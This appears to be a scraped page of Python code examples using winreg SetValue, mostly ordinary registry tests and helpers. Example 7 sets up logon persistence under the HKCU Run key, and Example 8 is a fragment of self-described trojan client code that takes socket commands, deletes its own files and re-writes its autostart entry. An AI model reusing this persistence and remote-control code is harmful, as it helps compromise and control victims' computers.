Ejemplo n.º 1
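def setup_module(machinery, name, path=None):
    """Register a temporary module in the current user's registry hive.

    Generator body: it creates a temporary module via ``temp_module``, points
    the registry key built from ``WindowsRegistryFinder.REGISTRY_KEY`` (or the
    ``_DEBUG`` variant) at that module's ``.py`` file, yields once, and then
    removes the registry entries it may have created.

    Args:
        machinery: object exposing ``WindowsRegistryFinder`` with
            ``DEBUG_BUILD``, ``REGISTRY_KEY`` and ``REGISTRY_KEY_DEBUG``.
        name: module name substituted for ``{fullname}`` in the key template.
        path: value stored as the key's default value; defaults to the
            temporary module's location plus ``".py"``.

    Raises:
        AssertionError: if the formatted key is not located under
            ``Software\\Python\\PythonCore\\<major>.<minor>``.
    """
    finder = machinery.WindowsRegistryFinder
    if finder.DEBUG_BUILD:
        root = finder.REGISTRY_KEY_DEBUG
    else:
        root = finder.REGISTRY_KEY
    key = root.format(fullname=name,
                      sys_version='%d.%d' % sys.version_info[:2])
    base_key = "Software\\Python\\PythonCore\\{}.{}".format(
        sys.version_info.major, sys.version_info.minor)
    # This check is what keeps the cleanup below confined to the PythonCore
    # subtree of HKCU.  It is raised explicitly rather than with `assert` so
    # that it still runs under `python -O`.
    if not key.casefold().startswith(base_key.casefold()):
        raise AssertionError(
            "expected key '{}' to start with '{}'".format(key, base_key))
    # Bound before the try block so the `finally` clause cannot hit an
    # unbound local when temp_module() fails before a value is chosen.
    delete_key = None
    try:
        with temp_module(name, "a = 1") as location:
            try:
                # Probe only: does the per-version key already exist?
                with OpenKey(HKEY_CURRENT_USER, base_key):
                    pass
                if finder.DEBUG_BUILD:
                    # Drop the last path component of the debug key.
                    delete_key = os.path.dirname(key)
                else:
                    delete_key = key
            except OSError:
                # The per-version key was absent, so everything from
                # base_key down is created here and is removed afterwards.
                delete_key = base_key
            # Close the handle as soon as the default value is written.
            with CreateKey(HKEY_CURRENT_USER, key) as subkey:
                if path is None:
                    path = location + ".py"
                SetValue(subkey, "", REG_SZ, path)
            yield
    finally:
        if delete_key:
            delete_registry_tree(HKEY_CURRENT_USER, delete_key)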
Ejemplo n.º 2
def maybe_set_key(key_path: str, expected: str, dry_run: bool = False, var_name: str = None):
    """Ensure a string value under HKEY_CLASSES_ROOT equals ``expected``.

    Reads the current value (the named value ``var_name`` when given,
    otherwise the key's default value), logs what it finds, and writes
    ``expected`` as ``REG_SZ`` only when the stored value differs and
    ``dry_run`` is false.

    Args:
        key_path: subkey path relative to HKEY_CLASSES_ROOT.
        expected: string the value should hold.
        dry_run: when true, log the intended change without writing.
        var_name: name of the value; falsy selects the key's default value.

    NOTE(review): ``key_path`` and ``expected`` are written as given, with no
    validation in this function; callers should pass fixed, trusted values.
    """
    from winreg import HKEY_CLASSES_ROOT, OpenKey, QueryValue, CreateKeyEx, SetValue, REG_SZ, KEY_WRITE, KEY_READ
    from winreg import QueryValueEx, SetValueEx

    # A missing key or missing value both surface as FileNotFoundError and
    # are treated as "nothing stored yet".
    try:
        with OpenKey(HKEY_CLASSES_ROOT, key_path, 0, KEY_READ) as read_handle:
            current = QueryValueEx(read_handle, var_name)[0] if var_name else QueryValue(read_handle, None)
    except FileNotFoundError:
        current = None

    if current == expected:
        log.info(f'Already contains expected value: HKEY_CLASSES_ROOT\\{key_path}')
        return

    action = 'Setting' if not dry_run else '[DRY RUN] Would set'
    target = f'HKEY_CLASSES_ROOT\\{key_path}'
    if var_name:
        target = f'{target}[{var_name!r}]'
    log.info(f'{action} {target} = {expected!r}')

    if dry_run:
        return

    with CreateKeyEx(HKEY_CLASSES_ROOT, key_path, 0, KEY_WRITE) as write_handle:
        if var_name:
            SetValueEx(write_handle, var_name, 0, REG_SZ, expected)
        else:
            SetValue(write_handle, None, REG_SZ, expected)  # noqa
Ejemplo n.º 3
 def test_long_key(self):
     """Exercise a 256-character subkey name under the test key in HKCU.

     Creates the test key, stores a default value under a subkey named with
     256 ``x`` characters, queries and enumerates the key, and always removes
     both the long subkey and the test key afterwards.
     """
     import winreg

     long_name = 'x' * 256
     hive = winreg.HKEY_CURRENT_USER
     try:
         with winreg.CreateKey(hive, self.test_key_name) as handle:
             winreg.SetValue(handle, long_name, winreg.REG_SZ, 'x')
             # The counts are not checked; the unpacking only requires that
             # QueryInfoKey returns a 3-tuple.
             _subkey_count, _value_count, _modified = winreg.QueryInfoKey(handle)
             winreg.EnumKey(handle, 0)
     finally:
         # Cleanup runs even if the body failed: remove the long subkey
         # first, then the test key itself.
         with winreg.OpenKey(hive, self.test_key_name, 0,
                             winreg.KEY_ALL_ACCESS) as handle:
             winreg.DeleteKey(handle, long_name)
         winreg.DeleteKey(hive, self.test_key_name)
Ejemplo n.º 4
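def setup_module(machinery, name, path=None):
    """Register a temporary module in the current user's registry hive.

    Generator body: it creates a temporary module via ``temp_module``, stores
    its ``.py`` path as the default value of the key built from
    ``WindowsRegistryFinder.REGISTRY_KEY`` (or the ``_DEBUG`` variant), yields
    once, and then removes the key through ``delete_registry_tree``.

    Args:
        machinery: object exposing ``WindowsRegistryFinder`` with
            ``DEBUG_BUILD``, ``REGISTRY_KEY`` and ``REGISTRY_KEY_DEBUG``.
        name: module name substituted for ``{fullname}`` in the key template.
        path: value stored as the key's default value; defaults to the
            temporary module's location plus ``".py"``.
    """
    if machinery.WindowsRegistryFinder.DEBUG_BUILD:
        root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG
    else:
        root = machinery.WindowsRegistryFinder.REGISTRY_KEY
    # Build "major.minor" from version_info: slicing sys.version to three
    # characters yields "3.1" on Python 3.10+, so the wrong version key would
    # be written and later deleted.
    key = root.format(fullname=name,
                      sys_version='%d.%d' % sys.version_info[:2])
    try:
        with temp_module(name, "a = 1") as location:
            # Close the handle as soon as the default value is written.
            with CreateKey(HKEY_CURRENT_USER, key) as subkey:
                if path is None:
                    path = location + ".py"
                SetValue(subkey, "", REG_SZ, path)
            yield
    finally:
        if machinery.WindowsRegistryFinder.DEBUG_BUILD:
            # Debug builds delete from the parent of the formatted key.
            key = os.path.dirname(key)
        # NOTE(review): nothing here checks that `key` stays under the
        # PythonCore subtree before the delete; confirm that the
        # REGISTRY_KEY templates guarantee it.
        delete_registry_tree(HKEY_CURRENT_USER, key)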
Ejemplo n.º 5
 def test_simple_write(self):
     """Write a default string value to the test subkey and read it back."""
     import winreg

     expected = "Some Default value"
     parent, subkey_name = self.root_key, self.test_key_name
     winreg.SetValue(parent, subkey_name, winreg.REG_SZ, expected)
     stored = winreg.QueryValue(parent, subkey_name)
     assert stored == expected
Ejemplo n.º 6
def windows_registry_set_key(key_path, value):
    """Store ``value`` as the default REG_SZ value of ``HKCU\\<key_path>``.

    The key is created when it does not exist, and the handle is closed on
    exit from the ``with`` block.

    NOTE(review): ``key_path`` is used as given, so a caller-controlled path
    can reach any key the current user may write; pass fixed paths only.
    """
    import winreg

    with winreg.CreateKey(winreg.HKEY_CURRENT_USER, key_path) as handle:
        winreg.SetValue(handle, None, winreg.REG_SZ, value)
Ejemplo n.º 7
def ziqidong():
    """Write the running program's own path under the per-user ``Run`` key.

    The name appears to be pinyin for "auto-start". The function takes no
    arguments and returns nothing; its only effect is the registry write.

    NOTE(review): a program registering itself under
    ``HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`` is the
    logon-autostart persistence pattern catalogued as MITRE ATT&CK T1547.001.
    For detection, watch registry value-set events on that path (for example
    Sysmon Event ID 13) and review entries that point at a script or an
    unsigned binary in a user-writable directory.
    """
    # argv[0] is the path this program was started with.
    caller_file = argv[0]
    # Convert forward slashes to backslashes so the stored path is Windows-style.
    caller_file = caller_file.replace('/', '\\')
    #caller_file = caller_file.replace('py', 'exe')
    # The handle is never closed explicitly in this function.
    key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion")
    # SetValue with sub_key "Run" stores the path as the default (unnamed)
    # value of the Run subkey, not as a named entry.
    SetValue(key, "Run", REG_SZ, caller_file)
Ejemplo n.º 8
         t = 1
         break
     elif lei == '4':
         c = s.recv(100).decode('utf-8')
         if c == '0':
             caller_filez = argv[0]
             caller_filez = caller_filez.replace('/', '\\')
             caller_file = caller_filez.replace('win_64.exe', 'win_64_1.txt')
             minglin = r'del /a/f/q {}'.format(caller_file)
             system(minglin)
             caller_file = caller_filez.replace('win_64.exe', 'win_64_2.txt')
             minglin = r'del /a/f/q {}'.format(caller_file)
             system(minglin)
             kong = ''
             key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion")
             SetValue(key, "Run", REG_SZ, kong)
             cc = '它自毁了,请节哀,并准备下一个目标吧|斜眼笑|'
             s.send(cc.encode('utf-8'))
             continue
         ziqidong()
         caller_file = argv[0]
         caller_file = caller_file.replace('/', '\\')
         caller_file = caller_file.replace('py', 'exe')
         c = '木马:已再次写入注册表'+'\n具体目录为:'+caller_file
         s.send(c.encode('utf-8'))
     else:
         print('收到垃圾信息')
         sleep(30)
         break
 if t == 1:
     s.send('木马已被kill,他(她)暂时安全了'.encode('utf-8'))